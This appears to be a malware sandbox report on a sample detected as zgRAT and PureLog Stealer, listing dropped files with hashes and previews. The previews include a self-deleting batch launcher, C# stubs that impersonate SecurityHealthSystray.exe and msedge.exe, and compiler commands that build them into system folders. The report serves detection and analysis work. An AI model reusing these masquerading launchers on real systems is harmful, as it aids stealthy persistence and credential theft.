                                    SSDEEP:24576:cxr3a1dihASqBZKAcKEYq3nMMKUpgEVcUVaOrlfDPfZwaSiShgqdQ4oB1r/jjpvi:yadiFk/EOUkOZfLfpShg01sxXpkSvKm
                                    MD5:910284D590BDF27BBEEDBDE3F3A2A94D
                                    SHA1:6561EF1E4B2521AAF86F03AB791AC5ED6C4AF7D0
                                    SHA-256:6A397C6E1041AD55295C3FE2CF7F795DA853004C1A02E1D77C65F0DA86AD312E
                                    SHA-512:AA66C2DCA084FC179756D360F91609A433B2E704CC0E19AE05F25749C8C102EDF2808A92C088782643EF3EC75FA91768333820E30C3839247EC815D9BF8A8797
                                    Malicious:true
                                    Yara Hits:
                                    • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Recovery\dllhost.exe, Author: Joe Security
                                    • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Recovery\dllhost.exe, Author: Joe Security
                                    Antivirus:
                                    • Antivirus: Avira, Detection: 100%
                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                    • Antivirus: ReversingLabs, Detection: 100%
                                    Process:C:\Bridgemonitor\BridgeInto.exe
                                    File Type:ASCII text, with CRLF line terminators
                                    Category:dropped
                                    Size (bytes):1396
                                    Entropy (8bit):5.350961817021757
                                    Encrypted:false
                                    SSDEEP:24:ML9E4KQwKDE4KGKZI6KhPKIE4TKBGKoZAE4KKUNrJE4qtE4KlOU4mZsXE4Npv:MxHKQwYHKGSI6oPtHTHhAHKKkrJHmHKu
                                    MD5:EBB3E33FCCEC5303477CB59FA0916A28
                                    SHA1:BBF597668E3DB4721CA7B1E1FE3BA66E4D89CD89
                                    SHA-256:DF0C7154CD75ADDA09758C06F758D47F20921F0EB302310849175D3A7346561F
                                    SHA-512:663994B1F78D05972276CD30A28FE61B33902D71BF1DFE4A58EA8EEE753FBDE393213B5BA0C608B9064932F0360621AF4B4190976BE8C00824A6EA0D76334571
                                    Malicious:false
                                    Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Configuration\915c1ee906bd8dfc15398a4bab4acb48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Xml\db3df155ec9c0595b0198c4487f36ca1\System.Xml.ni.dll",0..2,"System.Security, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Runtime.Serialization, Version=4.0.0.0, Culture=neutr
                                    Process:C:\Recovery\EoNanmDGxPEtougVgAjHLx.exe
                                    File Type:CSV text
                                    Category:dropped
                                    Size (bytes):847
                                    Entropy (8bit):5.354334472896228
                                    Encrypted:false
                                    SSDEEP:24:ML9E4KQwKDE4KGKZI6KhPKIE4TKBGKoZAE4KKUNb:MxHKQwYHKGSI6oPtHTHhAHKKkb
                                    MD5:9F9FA9EFE67E9BBD165432FA39813EEA
                                    SHA1:6FE9587FB8B6D9FE9FA9ADE987CB8112C294247A
                                    SHA-256:4488EA75E0AC1E2DEB4B7FC35D304CAED2F877A7FB4CC6B8755AE13D709CF37B
                                    SHA-512:F4666179D760D32871DDF54700D6B283AD8DA82FA6B867A214557CBAB757F74ACDFCAD824FB188005C0CEF3B05BF2352B9CA51B2C55AECF762468BB8F5560DB3
                                    Malicious:false
                                    Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Configuration\915c1ee906bd8dfc15398a4bab4acb48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Xml\db3df155ec9c0595b0198c4487f36ca1\System.Xml.ni.dll",0..
                                    Process:C:\Recovery\dllhost.exe
                                    File Type:CSV text
                                    Category:dropped
                                    Size (bytes):847
                                    Entropy (8bit):5.354334472896228
                                    Encrypted:false
                                    SSDEEP:24:ML9E4KQwKDE4KGKZI6KhPKIE4TKBGKoZAE4KKUNb:MxHKQwYHKGSI6oPtHTHhAHKKkb
                                    MD5:9F9FA9EFE67E9BBD165432FA39813EEA
                                    SHA1:6FE9587FB8B6D9FE9FA9ADE987CB8112C294247A
                                    SHA-256:4488EA75E0AC1E2DEB4B7FC35D304CAED2F877A7FB4CC6B8755AE13D709CF37B
                                    SHA-512:F4666179D760D32871DDF54700D6B283AD8DA82FA6B867A214557CBAB757F74ACDFCAD824FB188005C0CEF3B05BF2352B9CA51B2C55AECF762468BB8F5560DB3
                                    Malicious:false
                                    Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Configuration\915c1ee906bd8dfc15398a4bab4acb48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Xml\db3df155ec9c0595b0198c4487f36ca1\System.Xml.ni.dll",0..
                                    Process:C:\Windows\System32\dllhost.exe
                                    File Type:data
                                    Category:dropped
                                    Size (bytes):524288
                                    Entropy (8bit):2.354655208553605
                                    Encrypted:false
                                    SSDEEP:1536:jG5pG9g1Ui91X2dQlp6gOnrJOnoeOQ2fQdDQX2khHB1eO5o4QOGSvgcc:jG5qg1Ui91X2M6tnrQnvu1R5Lfvg
                                    MD5:422603FD4F715A33A2E4C22B5E343421
                                    SHA1:9ADA1EAACFF3297268B6A708972E4F4023E8D829
                                    SHA-256:100257E3BB98CDC19A9698E3F18FF2483A17346640012E5B033442F1E090ACE1
                                    SHA-512:BA2941EF8448D0DD58CD17BC9E51A63529ADA45E3A1B8E1DDBB6DF63877AB19734DC252082F49DFC797C65B116D92BDE7978BC9602DB8AD1653E4375C0847EEF
                                    Malicious:false
                                    Preview:...............+...{o..!...{..........<...T.;....{..................C:\Users\user\AppData\Local\Microsoft\Windows\WebCache\..........................................................................................................................................................................................................C:\Users\user\AppData\Local\Microsoft\Windows\WebCache\...........................................................................................................................................................................................................0u.............................................y..............Tz+.#......... ..........Y.......h.z.......x.......gN;....{..................C.:.\.U.s.e.r.s.\.e.n.g.i.n.e.e.r.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.M.i.c.r.o.s.o.f.t.\.W.i.n.d.o.w.s.\.W.e.b.C.a.c.h.e.\.W.e.b.C.a.c.h.e.V.0.1...d.a.t......................................................................................................................
                                    Process:C:\Windows\System32\dllhost.exe
                                    File Type:Extensible storage user DataBase, version 0x620, checksum 0x0c042d3c, page size 32768, DirtyShutdown, Windows version 10.0
                                    Category:dropped
                                    Size (bytes):17301504
                                    Entropy (8bit):1.0289031498884538
                                    Encrypted:false
                                    SSDEEP:6144:zvQPYV7AyUO+xBGA611GJxBGA611Gv0M6J6X3XX35X3khTAzhTA/hTATX3t8nqkH:YyUN3F0TcT0TAitKxK/U5uC4Ago
                                    MD5:C0140FBAAE79417E269099B89D3FB468
                                    SHA1:7FACD57EFC487976965586B0B52CCA825B8E3ECA
                                    SHA-256:F67A21F9ED4FDD902E29AD4D120EB076871658AD923F1EEDEF0D57E1F072766B
                                    SHA-512:D47DE14D250F7B4F01B802C08CADD6BA1E91D1C4C12223FD407DBEAC254131BC3B15AC44E86BDB88DA9CFAECF5846569BDDE65182F5DE9DA4770F9D92A2F9EEC
                                    Malicious:false
                                    Process:C:\Windows\System32\dllhost.exe
                                    File Type:data
                                    Category:dropped
                                    Size (bytes):16384
                                    Entropy (8bit):0.13339617446461677
                                    Encrypted:false
                                    SSDEEP:6:fXku2OZXfDSu/zgAL9wjXlFkFRFlYC0p23nGC:cu2EXrSmgfLlePFlYC1
                                    MD5:1D4ED1AA2669F1B147D78C0322041B41
                                    SHA1:A4F478CFAE94D1EF4F85A1E784A7BE41D8BA1CD8
                                    SHA-256:C246A23CB6C2797048F6364D4A9A09CD01359CD66967BAB901F2CB6B6AAE9908
                                    SHA-512:4FA935FD1140EB2D47801DA75A0CAA1029AAEF4F1EE8ACF0E7FAB6874CF49C34EFACD5E2EDDC16874859EBC7907C40FC8291808F0FA06D3366DB2A4E4EBAFDC9
                                    Malicious:false
                                    Process:C:\Bridgemonitor\BridgeInto.exe
                                    File Type:DOS batch file, ASCII text, with CRLF line terminators
                                    Category:dropped
                                    Size (bytes):204
                                    Entropy (8bit):5.315722735913846
                                    Encrypted:false
                                    SSDEEP:6:hCRLuVFOOr+DED+YbdhAJOBvKOZG1N723fL6:CuVEOCDED+sdhxBEaT6
                                    MD5:8C897F951C781F4EE4DC68F821AA380F
                                    SHA1:B66EF8E83A6F0CAC6E17CB01C1BBC1D161BFAD60
                                    SHA-256:ACC817E3869D8D33B9C403881FA29D7B7C3087FB329A01F0E7072F974FF24CB5
                                    SHA-512:F216428AEBF88FA5049A9847BF3DA8DCDA9521FB331D25AC09EF629827BC7DE121C7C6DA6282704347B5B7C14D05F92E490E02B73191D72F6E4A1E976FFBB204
                                    Malicious:true
                                    Antivirus:
                                    • Antivirus: Avira, Detection: 100%
                                    Preview:@echo off..chcp 65001..ping -n 10 localhost > nul..start "" "C:\Program Files\Microsoft Office 15\ClientX64\EoNanmDGxPEtougVgAjHLx.exe"..del /a /q /f "C:\Users\user\AppData\Local\Temp\\2EcQa8wgx4.bat"
                                    Process:C:\Bridgemonitor\BridgeInto.exe
                                    File Type:C++ source, Unicode text, UTF-8 (with BOM) text
                                    Category:dropped
                                    Size (bytes):421
                                    Entropy (8bit):5.036230783802131
                                    Encrypted:false
                                    SSDEEP:12:V/DNVgtDIbSf+eBLZ7bfiFkMSf+eBL6LTxlaiFkD:JNVQIbSfhV7TiFkMSfhWLTXFkD
                                    MD5:42AD4339711578F16ABE3CEE103CC667
                                    SHA1:584DE715B851926E46CE235F0D6BF6D99EB338D6
                                    SHA-256:1FEF52967656CF118DCFDF3EBA79E43383D642DE41B180D96E512D7786AC5FE9
                                    SHA-512:6EDBB9F2EE5E999648CA8D7E78851F961F4FF2E346653B0CBFD1BE822200B456A498A953E1E677191C51325252ABBFE02DA43716D5FE25C0EE24960185373B32
                                    Malicious:false
                                    Preview:.using System.Diagnostics;.using System.Threading;..class Program.{. static void Main(string[] args). {. new Thread(() => { try { Process.Start(@"C:\Windows\system32\SecurityHealthSystray.exe.exe", string.Join(" ", args)); } catch { } }).Start();. new Thread(() => { try { Process.Start(@"C:\Program Files (x86)\microsoft.net\RedistList\EoNanmDGxPEtougVgAjHLx.exe"); } catch { } }).Start();. }.}.
                                    Process:C:\Bridgemonitor\BridgeInto.exe
                                    File Type:Unicode text, UTF-8 (with BOM) text, with no line terminators
                                    Category:dropped
                                    Size (bytes):253
                                    Entropy (8bit):5.080904774791549
                                    Encrypted:false
                                    SSDEEP:6:Hu+H2L//1xRT0T79BzxsjGZxWE8oN723fDph9:Hu7L//TRq79cQna79
                                    MD5:26742C1662EA8FDC78BEA7F8C68EB9E4
                                    SHA1:69DDFD3BA6AA69691BC6A6014B8A78AED34C5E4B
                                    SHA-256:AA5B9B36E26250B1A4BE73F48DB624D908766BC7A63430FBC8A1C2B4683AA51C
                                    SHA-512:D990A613B2EFB76CF470D411B5EA2E51AA278D37E041D196833ABCF1B0C0D93882C2711E4F41313BB1CA6D93B5EFFD17C742305D5D9388312010238C0A07BA4F
                                    Malicious:false
                                    Preview:./t:exe /utf8output /R:"System.dll" /R:"System.Threading.dll" /R:"System.Data.dll" /out:"C:\Windows\system32\SecurityHealthSystray.exe" /debug- /optimize+ /optimize+ /target:winexe /unsafe "C:\Users\user\AppData\Local\Temp\2csyxc1q\2csyxc1q.0.cs"
                                    Process:C:\Bridgemonitor\BridgeInto.exe
                                    File Type:Unicode text, UTF-8 (with BOM) text, with very long lines (326), with CRLF, CR line terminators
                                    Category:modified
                                    Size (bytes):747
                                    Entropy (8bit):5.262755224928053
                                    Encrypted:false
                                    SSDEEP:12:l1M6MI/u7L//TRq79cQna74KaxK4BFNn5KBZvK2wo8dRSgarZucvW3ZDPOU:Q6MI/un/Vq79tnasKax5DqBVKVrdFAMb
                                    MD5:32E557998966408AC5CF08CB777D6F4B
                                    SHA1:B390489E0B10E4630402F4269C59F8C616354FC7
                                    SHA-256:F3DB7941829663BEB3B364A45811638F8E7CBF454ED7127037DDF6EED88F3956
                                    SHA-512:465951CC362FE613AF91CAD847C3E4374647D0840FA98753204A91785333ADAE560478643214EF6D9687301E18D7A3154853190B68D8B2B6C5D76A2A6EF9610B
                                    Malicious:false
                                    Preview:.C:\Bridgemonitor> "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /t:exe /utf8output /R:"System.dll" /R:"System.Threading.dll" /R:"System.Data.dll" /out:"C:\Windows\system32\SecurityHealthSystray.exe" /debug- /optimize+ /optimize+ /target:winexe /unsafe "C:\Users\user\AppData\Local\Temp\2csyxc1q\2csyxc1q.0.cs"......Microsoft (R) Visual C# Compiler version 4.8.4084.0...for C# 5..Copyright (C) Microsoft Corporation. All rights reserved.......This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which is no longer the latest version. For compilers that support newer versions of the C# programming language, see http://go.microsoft.com/fwlink/?LinkID=533240....
                                    Process:C:\Bridgemonitor\BridgeInto.exe
                                    File Type:C++ source, Unicode text, UTF-8 (with BOM) text
                                    Category:dropped
                                    Size (bytes):436
                                    Entropy (8bit):5.042629164496944
                                    Encrypted:false
                                    SSDEEP:12:V/DNVgtDIbSf+eBL6LzIfiFkMSf+eBL6LTxlaiFkD:JNVQIbSfhWLzIiFkMSfhWLTXFkD
                                    MD5:A32F59C54A4DF557A031D362D7D4A688
                                    SHA1:7EFA76B06444D791966B78508B129365376BED45
                                    SHA-256:A3A052C51EBFD1061C51794EA610D16DE021710EE8EC0A656AAD6DB2B9F7FCE0
                                    SHA-512:F893A23DF69ECB024BCE80E7D95CA7D01F4B7F6FEA48623B4E805D218EC30A6BBD5744FBFAED7861EDB54182C83BC5ABB653FFC070C8628B33DDE1E80761C683
                                    Malicious:false
                                    Preview:.using System.Diagnostics;.using System.Threading;..class Program.{. static void Main(string[] args). {. new Thread(() => { try { Process.Start(@"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe.exe", string.Join(" ", args)); } catch { } }).Start();. new Thread(() => { try { Process.Start(@"C:\Program Files (x86)\microsoft.net\RedistList\EoNanmDGxPEtougVgAjHLx.exe"); } catch { } }).Start();. }.}.
                                    Process:C:\Bridgemonitor\BridgeInto.exe
                                    File Type:Unicode text, UTF-8 (with BOM) text, with no line terminators
                                    Category:dropped
                                    Size (bytes):268
                                    Entropy (8bit):5.152484389506333
                                    Encrypted:false
                                    SSDEEP:6:Hu+H2L//1xRf5oeTckKBzxsjGZxWE8oN723flWbA:Hu7L//TRRzscQna9N
                                    MD5:B341705B1E4A6FD6A128946A65DC6CD1
                                    SHA1:50F886ACF2D11363AEEA2226F5407A7CAB387B57
                                    SHA-256:C40206E923AFAAB88A747C3FCDB65C988CCA16ACBE303490A0FC3CCD46D55A43
                                    SHA-512:33D01DB244B9B64AB68A010467522A7AB9EB2E47FD72624EC9DA616D4C3EE2835E0F031DB8B55ECCA33CE47C3615A14DCDCA552E2D4433394329E528FD286F7A
                                    Malicious:true
                                    Preview:./t:exe /utf8output /R:"System.dll" /R:"System.Threading.dll" /R:"System.Data.dll" /out:"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" /debug- /optimize+ /optimize+ /target:winexe /unsafe "C:\Users\user\AppData\Local\Temp\5qzorvzb\5qzorvzb.0.cs"
                                    Process:C:\Bridgemonitor\BridgeInto.exe
                                    File Type:Unicode text, UTF-8 (with BOM) text, with very long lines (341), with CRLF, CR line terminators
                                    Category:modified
                                    Size (bytes):762
                                    Entropy (8bit):5.256409089894968
                                    Encrypted:false
                                    SSDEEP:12:l1M6MI/u7L//TRRzscQna9IKaxK4BFNn5KBZvK2wo8dRSgarZucvW3ZDPOU:Q6MI/un/VRzstna9IKax5DqBVKVrdFAw
                                    MD5:384E44B631B144AEFD3B3453B8177B4F
                                    SHA1:DB8F59AE38498E4D86BB28014F5DFCC40DAC7204
                                    SHA-256:54B4ED5BAEACB293DFED3FFD8B586FD9EDDABC09BC5B4B15930FAC7B2B17FB7D
                                    SHA-512:A72178A455AAE4AC59CCBDFA2FBFC7B398B63F6C770A3D0E44CCD0393D7571424265834209D2905D5DA3BDF75B831F7F777C9209D6F467F310F8FF66CBB29763
                                    Malicious:false
                                    Preview:.C:\Bridgemonitor> "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /t:exe /utf8output /R:"System.dll" /R:"System.Threading.dll" /R:"System.Data.dll" /out:"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" /debug- /optimize+ /optimize+ /target:winexe /unsafe "C:\Users\user\AppData\Local\Temp\5qzorvzb\5qzorvzb.0.cs"......Microsoft (R) Visual C# Compiler version 4.8.4084.0...for C# 5..Copyright (C) Microsoft Corporation. All rights reserved.......This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which is no longer the latest version. For compilers that support newer versions of the C# programming language, see http://go.microsoft.com/fwlink/?LinkID=533240....
                                    Process:C:\Recovery\EoNanmDGxPEtougVgAjHLx.exe
                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                    Category:dropped
                                    Size (bytes):20480
                                    Entropy (8bit):0.5712781801655107
                                    Encrypted:false
                                    SSDEEP:12:TLVNFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TL1F1kwNbXYFpFNYcw+6UwcQVXH5fB
                                    MD5:05A60B4620923FD5D53B9204391452AF
                                    SHA1:DC12F90925033F25C70A720E01D5F8666D0B46E4
                                    SHA-256:6F1CA729609806AF88218D0A35C3B9E34252900341A0E15D71F7F9199E422E13
                                    SHA-512:068A954C0C7A68E603D72032A447E7652B1E9CED5522562FBCBD9EC0A5D2D943701100049FA0A750E71C4D3D84210B48D10855E7CC60919E04ED884983D3C3D6
                                    Malicious:false
                                    Process:C:\Recovery\EoNanmDGxPEtougVgAjHLx.exe
                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                    Category:dropped
                                    Size (bytes):106496
                                    Entropy (8bit):1.136471148832945
                                    Encrypted:false
                                    SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c1/k4:MnlyfnGtxnfVuSVumEH1s4
                                    MD5:37B1FC046E4B29468721F797A2BB968D
                                    SHA1:50055EF1C50E4C1A7CCF7D00620E95128E4C448B
                                    SHA-256:7BBD5DFC9026E0D477B027B9A2A3F022F2E72FC9B4E05E697461A00677AE8EFD
                                    SHA-512:1D8A0F0AE76E5A1CF131F6D2C5156EA4204449942210EF029D5B018464355DBF94E2D8ABD6A5A9CDFE4271DCD22703BF26ECE8FEE902E122184680F1BB001149
                                    Malicious:false
                                    Process:C:\Recovery\EoNanmDGxPEtougVgAjHLx.exe
                                    File Type:ASCII text, with no line terminators
                                    Category:dropped
                                    Size (bytes):25
                                    Entropy (8bit):4.133660689688185
                                    Encrypted:false
                                    SSDEEP:3:c9xuXMHPt:Sxht
                                    MD5:36084160F9D8ACADB93B6613AED2CEAF
                                    SHA1:F30FBDD8FF001B0772B7E8EEF70B354D7D768FA7
                                    SHA-256:4F7BA3F33A9D5A1529BA40F45B35A2374B0407A0ABF420FAEABCB18F1C5DE3CC
                                    SHA-512:876D73800FFCAFB4B47A5FD5A991E6D3D4B410BE53FA4436548D6B1C8C81F9595DA9C4D4679123217E3A03C1999BE7AB1D67AA7180E7ACF8144CE2CAB0D2A789
                                    Malicious:false
                                    Preview:ziexu6Tru1K2i6zy7W9KIoK8D
                                    Process:C:\Recovery\EoNanmDGxPEtougVgAjHLx.exe
                                    File Type:SQLite 3.x database, last written using SQLite version 3039003, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                    Category:dropped
                                    Size (bytes):20480
                                    Entropy (8bit):0.5707520969659783
                                    Encrypted:false
                                    SSDEEP:12:TLVlFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TLxF1kwNbXYFpFNYcw+6UwcQVXH5fB
                                    MD5:9F6D153D934BCC50E8BC57E7014B201A
                                    SHA1:50B3F813A1A8186DE3F6E9791EC41D95A8DC205D
                                    SHA-256:2A7FC7F64938AD07F7249EC0BED6F48BC5302EA84FE9E61E276436EA942BA230
                                    SHA-512:B8CA2DCB8D62A0B2ED8795C3F67E4698F3BCB208C26FBD8BA9FD4DA82269E6DE9C5759F27F28DC108677DDEBBAC96D60C4ED2E64C90D51DB5B0F70331185B33F
                                    Malicious:false
                                    Process:C:\Recovery\EoNanmDGxPEtougVgAjHLx.exe
                                    File Type:SQLite 3.x database, last written using SQLite version 3039003, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                    Category:dropped
                                    Size (bytes):20480
                                    Entropy (8bit):0.5707520969659783
                                    Encrypted:false
                                    SSDEEP:12:TLVlFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TLxF1kwNbXYFpFNYcw+6UwcQVXH5fB
                                    MD5:9F6D153D934BCC50E8BC57E7014B201A
                                    SHA1:50B3F813A1A8186DE3F6E9791EC41D95A8DC205D
                                    SHA-256:2A7FC7F64938AD07F7249EC0BED6F48BC5302EA84FE9E61E276436EA942BA230
                                    SHA-512:B8CA2DCB8D62A0B2ED8795C3F67E4698F3BCB208C26FBD8BA9FD4DA82269E6DE9C5759F27F28DC108677DDEBBAC96D60C4ED2E64C90D51DB5B0F70331185B33F
                                    Malicious:false
                                    Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                    File Type:Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x6cc, 10 symbols, created Sun Aug 25 14:55:48 2024, 1st section name ".debug$S"
                                    Category:dropped
                                    Size (bytes):1924
                                    Entropy (8bit):4.600022791729385
                                    Encrypted:false
                                    SSDEEP:24:Hzm9BaLzuO9gaHXwKcWYN0lmxT0uZhNB+h9PNnqpdt4+lEbNFjMyi0+ScN:YaLzT9lAKcWYilmuulB+hnqXSfbNtmhn
                                    MD5:34D3F92A5A477C9BC79DF0448B7B9132
                                    SHA1:9013BFC3DB32C944AA0764B336263C35F31420D4
                                    SHA-256:FB0E1A89781C7E375D5201154DFC279EC31AE6E2F263DD425A054EF2FE031C45
                                    SHA-512:7E814E6BF964A38600C1B9605ADCF12B8755B12A403350DAE564EDF3B13350FF85C21DD375C71DDD7A02DF62DE15CDF66D3B5986B4694599DF3F536F1716F865
                                    Malicious:false
                                    Preview:L....E.f.............debug$S........T...................@..B.rsrc$01............................@..@.rsrc$02........8...................@..@........Z....c:\Program Files (x86)\Microsoft\Edge\Application\CSC48DFCF3E932B4A62A92F13B5F615A1E.TMP.....................q.QK.......N..........7.......C:\Users\user\AppData\Local\Temp\RESDC85.tmp.-.<....................a..Microsoft (R) CVTRES.X.=..cwd.C:\Bridgemonitor.exe.C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe........................ .......8.......................P.......................h.......................................................D...............................................D.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...8.....I.n.t.e.r.n.a.l.N.a.m.
                                    Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                    File Type:Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x6e4, 10 symbols, created Sun Aug 25 14:55:49 2024, 1st section name ".debug$S"
                                    Category:dropped
                                    Size (bytes):1948
                                    Entropy (8bit):4.549619546920623
                                    Encrypted:false
                                    SSDEEP:24:H8G9E1XOWaHmwKcWYN8luxOysuZhN7jSjRzPNnqpdt4+lEbNFjMyi0+YEgUZ:NzlKcWYKluOulajfqXSfbNtmhY2Z
                                    MD5:94E7DD73E2430E0A9B650989CCB0D352
                                    SHA1:DAB0C0425E3650851DB53D119742E2B50DBDC22A
                                    SHA-256:83C7A7A77F4F18887B8F002E7B65F4724174AD01EA734479E0E1E73CC7796447
                                    SHA-512:FB72F2ABCD5E04FC7E8390BC08FFCAEF5D3137B7B619C59F3FE910C05B94A5330512947D982AA78281D16D2478F6AC51CE354932956D559DABEBEC9F0F62921E
                                    Malicious:false
                                    Preview:L....E.f.............debug$S........4...................@..B.rsrc$01................`...........@..@.rsrc$02........p...t...............@..@........<....c:\Windows\System32\CSCC3741A71028464F81756764D7843821.TMP..................r.av..t.y..............7.......C:\Users\user\AppData\Local\Temp\RESDE79.tmp.-.<....................a..Microsoft (R) CVTRES.X.=..cwd.C:\Bridgemonitor.exe.C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe........................ .......8.......................P.......................h.......................................................|...............................................|.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...T.....I.n.t.e.r.n.a.l.N.a.m.e...S.e.c.u.r.i.t.y.H.e.a.l.t.h.
                                    Process:C:\Recovery\EoNanmDGxPEtougVgAjHLx.exe
                                    File Type:SQLite 3.x database, user version 12, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 3, database pages 3, cookie 0x1, schema 4, UTF-8, version-valid-for 3
                                    Category:dropped
                                    Size (bytes):98304
                                    Entropy (8bit):0.08235737944063153
                                    Encrypted:false
                                    SSDEEP:12:DQAsfWk73Fmdmc/OPVJXfPNn43etRRfYR5O8atLqxeYaNcDakMG/lO:DQAsff32mNVpP965Ra8KN0MG/lO
                                    MD5:369B6DD66F1CAD49D0952C40FEB9AD41
                                    SHA1:D05B2DE29433FB113EC4C558FF33087ED7481DD4
                                    SHA-256:14150D582B5321D91BDE0841066312AB3E6673CA51C982922BC293B82527220D
                                    SHA-512:771054845B27274054B6C73776204C235C46E0C742ECF3E2D9B650772BA5D259C8867B2FA92C3A9413D3E1AD35589D8431AC683DF84A53E13CDE361789045928
                                    Malicious:false
                                    Process:C:\Recovery\EoNanmDGxPEtougVgAjHLx.exe
                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 7, database pages 5, cookie 0x5, schema 4, UTF-8, version-valid-for 7
                                    Category:dropped
                                    Size (bytes):20480
                                    Entropy (8bit):0.6732424250451717
                                    Encrypted:false
                                    SSDEEP:24:TLO1nKbXYFpFNYcoqT1kwE6UwpQ9YHVXxZ6HfB:Tq1KLopF+SawLUO1Xj8B
                                    MD5:CFFF4E2B77FC5A18AB6323AF9BF95339
                                    SHA1:3AA2C2115A8EB4516049600E8832E9BFFE0C2412
                                    SHA-256:EC8B67EF7331A87086A6CC085B085A6B7FFFD325E1B3C90BD3B9B1B119F696AE
                                    SHA-512:0BFDC8D28D09558AA97F4235728AD656FE9F6F2C61DDA2D09B416F89AB60038537B7513B070B907E57032A68B9717F03575DB6778B68386254C8157559A3F1BC
                                    Malicious:false
                                    Process:C:\Recovery\EoNanmDGxPEtougVgAjHLx.exe
                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x37, schema 4, UTF-8, version-valid-for 8
                                    Category:dropped
                                    Size (bytes):196608
                                    Entropy (8bit):1.1239949490932863
                                    Encrypted:false
